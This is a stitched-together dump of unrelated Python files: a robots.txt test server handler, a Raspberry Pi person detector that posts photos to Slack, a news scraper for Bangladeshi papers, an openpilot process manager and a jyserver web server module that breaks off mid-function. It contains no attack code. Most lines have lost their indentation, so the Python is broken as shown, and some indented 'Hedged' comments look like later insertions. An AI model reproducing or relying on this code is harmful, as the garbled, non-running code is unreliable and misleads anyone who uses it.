elif self.path.startswith('/sleep/'):
self._handle_sleep_request()
elif self.path.startswith('/expires/'):
self._handle_expires_request()
elif self.path.startswith('/die_die_die/'):
# It's time to quit. This uses code from here:
# http://stackoverflow.com/questions/10085996/shutdown-socketserver-serve-forver-in-one-thread-python-application/22533929#22533929
kill_server = lambda server: server.shutdown()
kill_thread = threading.Thread(target=kill_server, args=(self.server,))
kill_thread.start()
self.send_response(200)
self.end_headers()
def log_request(self, code='-', size='-'):
"""Override base class log_request() to silence chatter to console"""
pass
def _handle_encoding_request(self):
"""Return robots.txt content in a specific encoding.
The path must be something like '/encoding/utf-8/robots.txt' where the encoding can vary.
"""
path_elements = self.path.split('/')
encoding = path_elements[2]
# Read content from standard data file which is encoded as utf-8.
filename = os.path.join(os.path.dirname(__file__), 'robots.txt')
# Open in binary mode so this works under both Python 2 and 3, then decode from utf-8.
with open(filename, 'rb') as f:
content = f.read().decode('utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset={}'.format(encoding))
self.end_headers()
# Re-encode the text with the requested charset before writing to the binary stream.
self.wfile.write(content.encode(encoding))
def _handle_response_code_request(self):
"""Respond with a specific response code (e.g. 200, 404, etc.)
The path must be something like '/response_code/777/robots.txt' where the code can vary.
"""
path_elements = self.path.split('/')
response_code = int(path_elements[2])
self.send_response(response_code)
self.end_headers()
def _handle_sleep_request(self):
"""Sleep (wait) for a specific amount of time before responding with 200.
The path must be something like '/sleep/2/robots.txt' where the sleep time can vary. The
sleep time can be a float.
"""
path_elements = self.path.split('/')
sleep_time = float(path_elements[2])
time.sleep(sleep_time)
self.send_response(200)
self.end_headers()
def _handle_expires_request(self):
"""Respond with 200 and includes an Expires header.
The Expires header will use the date and format encoded in the path. The path must be
something like '/expires/2015-12-15-01-01-01/rfc1123/robots.txt' where the timestamp and
format can vary.
The timestamp is in ISO order but delimited with '-' to make it URL-friendly.
The format can be one of the 3 specified in the HTTP 1.1 spec: 'rfc1123', 'rfc850', or
'asctime'.
"""
path_elements = self.path.split('/')
# expiration_date is in ISO format ordering, but with all elements delimited by dashes.
expiration_date = path_elements[2]
rfc_format = path_elements[3]
expiration_date = datetime.datetime.strptime(expiration_date, '%Y-%m-%d-%H-%M-%S')
# Make it a UTC time.
expiration_date = expiration_date.replace(tzinfo=get_utc_timezone())
if rfc_format == 'rfc1123':
expiration_date = format_as_rfc1123(calendar.timegm(expiration_date.timetuple()))
elif rfc_format == 'rfc850':
expiration_date = format_as_rfc850(expiration_date)
elif rfc_format == 'asctime':
expiration_date = format_as_asctime(expiration_date)
self.send_response(200)
self.send_header('Expires', expiration_date)
self.end_headers()
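# Hedged usage sketch (not part of the original test suite): running this module directly
# starts MyHTTPRequestHandler on an unused port in a background thread, exercises the
# /sleep/ endpoint described above, and then shuts the server down.
if __name__ == '__main__':
    if PY_MAJOR_VERSION < 3:
        from BaseHTTPServer import HTTPServer
        from urllib2 import urlopen
    else:
        from http.server import HTTPServer
        from urllib.request import urlopen
    port = find_unused_port()
    server = HTTPServer(('localhost', port), MyHTTPRequestHandler)
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.daemon = True
    server_thread.start()
    # /sleep/0.5/robots.txt waits half a second and then responds with 200
    response = urlopen('http://localhost:{}/sleep/0.5/robots.txt'.format(port))
    print('sleep endpoint responded with status', response.getcode())
    server.shutdown()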
|
main_detection.py
|
from tflite_runtime.interpreter import Interpreter
from slacker import Slacker
import picamera
import numpy as np
import cv2
import io
import time
import datetime
import threading
def wait_input():
global key_flag
input()
key_flag = False
def set_interpreter(interpreter):
interpreter.set_num_threads(4)
interpreter.allocate_tensors()
def set_input_tensor(interpreter, image):
tensor_index = interpreter.get_input_details()[0]['index']
input_tensor = interpreter.tensor(tensor_index)()[0]
input_tensor[:, :] = image
def get_output_tensor(interpreter, index):
output_details = interpreter.get_output_details()[index]
tensor = np.squeeze(interpreter.get_tensor(output_details['index']))
return tensor
# Run object-detection inference
def detect_objects(interpreter, image):
set_input_tensor(interpreter, image)
interpreter.invoke()
detect_flag = False
scores_array = []
boxes = get_output_tensor(interpreter, 0)
classes = get_output_tensor(interpreter, 1)
scores = get_output_tensor(interpreter, 2)
count = int(get_output_tensor(interpreter, 3))
for i in range(count):
if scores[i] >= 0.5 and classes[i] == 0:
scores_array.append(scores[i])
if scores_array:
max_score = scores_array.index(max(scores_array))
target_box = boxes[max_score]
detect_flag = True
else:
target_box = []
detect_flag = False
return detect_flag, target_box
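# Hedged note (assumption based on the standard TFLite SSD postprocess output): the
# returned target_box follows the [ymin, xmin, ymax, xmax] convention in normalized
# coordinates; person_position() below converts it to pixel columns.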
def person_position(result, width):
_, xmin, _, xmax = result
after_xmin = int(xmin * width) if int(xmin * width) >= 0 else 0
after_xmax = int(xmax * width) if int(xmax * width) >= 0 else 0
return after_xmin, after_xmax
def get_center_line(left, right):
return (left + right) // 2
def image_cap(width, height, count):
camera.resolution = (width, height)
filepath = "image/" + str(count) + ".jpg"
camera.capture(filepath)
camera.resolution = (480, 270)
return filepath
# Upload the image to Slack (uses Hubot)
def upload_image(file):
# API token for your own Slack workspace
token = 'api-token'
# channel to post to
channel = 'channel'
upload_file = file
slacker = Slacker(token)
slacker.files.upload(file_=upload_file, channels=channel)
if __name__ == '__main__':
interpreter = Interpreter("model/mobilenet_ssd_v2_coco_quant_postprocess.tflite")
set_interpreter(interpreter)
with picamera.PiCamera() as camera:
image_width, image_height = 480,270
camera.resolution = (image_width, image_height)
camera.framerate = 15
camera.shutter_speed = 30000
camera.iso = 800
stream = io.BytesIO()
key_flag = True
person_detect_flag = False
push_count = 0
filepath_array = []
th = threading.Thread(target=wait_input)
th.start()
while key_flag:
camera.capture(stream, format='jpeg', use_video_port=True)
frame = np.frombuffer(stream.getvalue(), dtype=np.uint8)
getimage = cv2.imdecode(frame, 1)
inputimage = cv2.resize(getimage, (300, 300))
result_flag, result_box = detect_objects(interpreter, inputimage)
if result_flag:
left_line, right_line = person_position(result_box, image_width)
center_line = get_center_line(left_line, right_line)
#cv2.line(getimage, (left_line,0), (left_line,image_height), (0, 255, 0), 2)
#cv2.line(getimage, (right_line,0), (right_line,image_height), (0, 255, 0), 2)
#cv2.line(getimage, (center_line,0), (center_line,image_height), (255, 0, 0), 2)
print(left_line, right_line, center_line)
if not person_detect_flag:
save_left_line, save_right_line = left_line, right_line
person_detect_flag = True
else:
pass
#cv2.line(getimage, (save_left_line,0), (save_left_line,image_height), (0, 0, 255), 2)
#cv2.line(getimage, (save_right_line,0), (save_right_line,image_height), (0, 0, 255), 2)
if not save_left_line < center_line < save_right_line:
push_count += 1
print(push_count)
file_path = image_cap(1920, 1080, push_count)
filepath_array.append(file_path)
person_detect_flag = False
else:
print('Not detection')
#cv2.imshow('image', getimage)
#cv2.waitKey(1)
stream.truncate()
stream.seek(0)
th.join()
#cv2.destroyAllWindows()
for file in filepath_array:
upload_image(file)
|
test_logserver.py
|
#from resc.resclog.logserver.server import start_server
#from multiprocessing import Process
#import time
#import requests
#import pytest
#import asyncio
#
#_IP="http://localhost:55555"
#class TestServer:
# def setup_server(self):
# self.process = Process(target=start_server,daemon=True)
# self.process.start()
# def terminate_server(self):
# self.process.kill()
#
#@pytest.fixture(scope="module",autouse=True)
#def setup_server():
# server = TestServer()
# server.setup_server()
# time.sleep(5)
# yield server
# server.terminate_server()
#
#def test_index(setup_server):
# pass
# server = setup_server
#
# response = requests.get(_IP,timeout=30)
# assert response is not None
# assert isinstance(response.status_code,int)
# assert response.status_code == 200
# assert isinstance(response.content,bytes)
# assert len(response.content)>0
#
# print(response.content)
|
scraper3.py
|
import timeit
import threading
import requests
from bs4 import BeautifulSoup
from news.models import News
# checking if that news link exists on database
def checkIfExist(newsLink):
numOfNews = News.objects.filter(newslink=newsLink).count()
return numOfNews
# Main news page to bring more news
def mainNewsPage(url):
res = requests.get(url)
return BeautifulSoup(res.text, 'html.parser')
# collect news links
def collectLinks(soup, findClass, name):
listOfLink = []
for findLink in soup.find_all(findClass):
link = findLink.get('href')
if len(str(link)) >= 45 and name.lower() in link:
listOfLink.append(link)
links = list(dict.fromkeys(listOfLink)) # remove same link
links.reverse()
return links
# save to database
def saveToDB(head, imageLink, newsLink, desc, name):
if desc != '' and len(head) < 90:
news = News(heading=head, imagelink=imageLink,
newslink=newsLink, details=desc, papername=name)
news.save()
print(head)
# web scraping Jugantor
def jugantor():
name = 'Jugantor'
url = 'https://www.jugantor.com/all-news'
findClass = 'a', {'class': 'text-decoration-none'}
soup = mainNewsPage(url)
links = collectLinks(soup, findClass, name)
while len(links) > 0:
newsLink = links.pop()
try:
if checkIfExist(newsLink) == 0:
news_url = requests.get(newsLink)
soup = BeautifulSoup(news_url.text, 'html.parser')
headdiv = soup.find('h3', {'class': 'font-weight-bolder'})
head = headdiv.getText()
imagediv = soup.find(
'img', {'class': 'figure-img img-fluid rounded-0'})
imageLink = imagediv.get('src')
desc = ''
for i in soup.find_all('div',
{'class': 'IfTxty news-element-text text-justify my-2 pr-md-4 text-break'}):
desc = i.getText().replace("\n", "")
saveToDB(head, imageLink, newsLink, desc, name)
else:
break
except Exception:
continue
# web scraping Samakal
def samakal():
name = 'Samakal'
url = 'https://samakal.com/list/all'
findClass = 'a', {'class': 'link-overlay'}
links = collectLinks(mainNewsPage(url), findClass, name)
while len(links) > 0:
newsLink = links.pop()
try:
if checkIfExist(newsLink) == 0:
news_url = requests.get(newsLink)
soup = BeautifulSoup(news_url.text, 'html.parser')
headdiv = soup.find('h1', {'class': 'detail-headline'})
head = headdiv.getText()
imagediv = soup.find('div', {'class': 'lightgallery'})
image = imagediv.find('img', {'class': 'img-responsive'})
imageLink = image.get('src')
desc = ''
body = soup.find('div', {'class': 'description'})
for i in body.find_all('span'):
desc += i.getText().replace("\n", "")
saveToDB(head, imageLink, newsLink, desc, name)
else:
break
except Exception:
continue
# web scraping Ittefaq
def ittefaq():
name = 'Ittefaq'
url = 'https://www.ittefaq.com.bd/all-news'
findClass = 'a', {'class': None}
links = collectLinks(mainNewsPage(url), findClass, name)
while len(links) > 0:
newsLink = links.pop()
try:
if checkIfExist(newsLink) == 0:
news_url = requests.get(newsLink)
soup = BeautifulSoup(news_url.text, 'html.parser')
headdiv = soup.find('div', {'id': 'dtl_hl_block'})
head = headdiv.getText()
imagediv = soup.find('div', {'id': 'dtl_img_block'})
image = imagediv.find('img')
imageLink = "https://www.ittefaq.com.bd" + image.get('src')
desc = ''
body = soup.find('div', {'id': 'dtl_content_block'})
for i in body.find_all('p'):
desc += i.getText().replace("\n", "")
saveToDB(head, imageLink, newsLink, desc, name)
else:
break
except Exception:
continue
# Start scraping
def Scrape():
start = timeit.default_timer()
print("______________Initialized Scrape_________________")
# Pass the functions themselves as targets; calling them here (e.g. target=jugantor())
# would run each scraper sequentially on the main thread instead of in parallel.
p1 = threading.Thread(target=jugantor)
p2 = threading.Thread(target=samakal)
p3 = threading.Thread(target=ittefaq)
p1.start()
p2.start()
p3.start()
# Wait for all scrapers to finish before measuring the elapsed time.
p1.join()
p2.join()
p3.join()
stop = timeit.default_timer()
print('Time: ', stop - start)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
"interbridged": "selfdrive.interbridge.interbridged",
"livedashserverd": "livedash.served",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
'interbridged',
"livedashserverd",
]
if not PC:
persistent_processes += [
'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
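# Hedged usage sketch (module path is hypothetical): a fork can register an extra python
# process without editing the tables above, e.g.
#   register_managed_process("mydaemond", "selfdrive.mydaemon.mydaemond", car_started=False)
# which makes it persistent; pass car_started=True to start/stop it with the onroad state.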
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpacePercent < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
Server.py
|
'''
Module for using jyserver standalone. This module uses the built-in
http.server module. It serves as a framework for integration into
other servers.
Example
-------------
```python
from jserver import Client, Server
class App(Client):
def __init__(self):
self.html = """
<p id="time">TIME</p>
<button id="reset"
onclick="server.reset()">Reset</button>
"""
def reset(self):
self.start0 = time.time()
self.js.dom.time.innerHTML = "{:.1f}".format(0)
def main(self):
self.start0 = time.time()
while True:
t = "{:.1f}".format(time.time() - self.start0)
self.js.dom.time.innerHTML = t
time.sleep(0.1)
httpd = Server(App)
print("serving at port", httpd.port)
httpd.start()
```
'''
from socketserver import ThreadingTCPServer
from http.server import SimpleHTTPRequestHandler
from http.cookies import SimpleCookie
from urllib.parse import urlparse, parse_qsl, unquote
from jyserver import ClientContext
import json
import threading
import queue
import os
import copy
import re
import time
import uuid
import traceback
class Client:
'''
Client class contains all methods and code that is executed on the server
and browser. Users of this library should inherit this class and implement
methods. There are three types of methods:
Attributes
------------
home
Optional filename to send when "/" is requested
html
Optional HTML to send when "/" is requested. If neither
`home` nor `html` are set, then it will send "index.html"
js
JS object for constructing and executing Javascript.
Methods
-----------
h(file, html)
Return appropriate HTML for the active page. Can only
be called once per page. Must be called if implementing
custom pages.
Optional Methods
------------
* main(self)
If this is implemented, then the server will begin execution of this
function immediately. The server will terminate when this function
terminates.
* index(self)
If `index` is defined, it will execute this function. The function
is responsible for returning the HTML with the h() method.
* page(self)
When the browser clicks on a link (or issues a GET) a method with the
name of the page is executed. For example, clicking on link "http:/pg1"
will cause a method named "pg1" to be executed.
* func(self)
When the browser executes a "server" command, the server runs a method
with the same name. For example, if the browser runs the Javascript
code:
server.addnum(15, 65)
then this method will be called:
def func(self, 15, 65)
'''
def __init__(self):
self.js = None
self._state = None
def h(self, html=None, file=None):
'''
Convert text to html and wrap with script code. Return the HTML as a
byte string. Must be called if implementing a custom page
such as `index`.
'''
return self._state.htmlsend(html, file)
class Server(ThreadingTCPServer):
'''
Server implements the web server, waits for connections and processes
commands. Each browser request is handled in its own thread and so requests
are asynchronous. The server starts listening when the "start()" method is
called.
Methods
------------
start(wait, cookies)
'''
PORT = 8080
allow_reuse_address = True
def __init__(self, appClass, port=PORT, ip=None, verbose=False):
'''
Parameters
-------------
appClass
Class that inherits Client. Note that this is the
class name and not an instance.
port
Port to listen to (default is PORT)
ip
IP address to bind (default is 127.0.0.1)
'''
self.verbose = verbose
# Instantiate objects of this class; must inherit from Client
self.appClass = appClass
self.contextMap = {}
# The port number
self.port = port
if ip is None:
ip = '127.0.0.1'
# Create the server object. Must call start() to begin listening.
super(Server, self).__init__((ip, port), Handler)
# def getContext(self):
# return self._getContextForPage('SINGLE')
def js(self):
'''
If you are implementing a single application without a "main"
function, you can call this to retrieve the JS object and set
up for single instance execution.
'''
return self._getContextForPage('SINGLE', True).getJS()
def _getContextForPage(self, uid, create = False):
c = ClientContext._getContextForPage(uid, self.appClass, create=create, verbose=self.verbose)
return c
def stop(self):
# self._BaseServer__shutdown_request = True
self._runmode = False
# self.shutdown()
def _runServer(self):
'''
Begin running the server until terminated.
'''
self._runmode = True
while self._runmode:
self.handle_request()
# self.serve_forever()
self.log_message("SERVER TERMINATED")
def start(self, wait=True, cookies=True):
'''
Start listening to the port and processing requests.
Parameters
------------
wait
Start listening and wait for server to terminate. If this
is false, start server on new thread and continue execution.
cookies
If True, try to use cookies to keep track of sessions. This
enables the browser to open multiple windows that all share
the same Client object. If False, then cookies are disabled
and each tab will be its own session.
'''
self.useCookies = cookies
if wait or hasattr(self.appClass, "main"):
self._runServer()
else:
server_thread = threading.Thread(target=self._runServer, daemon=True)
server_thread.start()
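# Hedged usage sketch: if the Client subclass does not define main(), the server can be
# started without blocking the calling thread, e.g.
#   httpd = Server(App, port=8080, verbose=True)
#   httpd.start(wait=False)   # serve on a background daemon thread
#   ...                       # do other work here
#   httpd.stop()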
def log_message(self, format, *args):
if self.verbose:
print(format % args)
def log_error(self, format, *args):
print(format % args)
class Handler(SimpleHTTPRequestHandler):
'''
Handler is created for each request by the Server. This class
handles the page requests and delegates tasks.
'''
def getContext(self):
return self.server._getContextForPage(self.uid)
def reply(self, data, num=200):
'''
Reply to the client with the given status code. If data is given as a string
it will be encoded as utf8. Cookies are sent if they are used.
'''
self.send_response(num)
if self.server.useCookies:
self.send_header(
"Set-Cookie", self.cookies.output(header='', sep=''))
self.end_headers()
if data is None:
return
if isinstance(data, str):
data = data.encode("utf8")
try:
self.wfile.write(data)
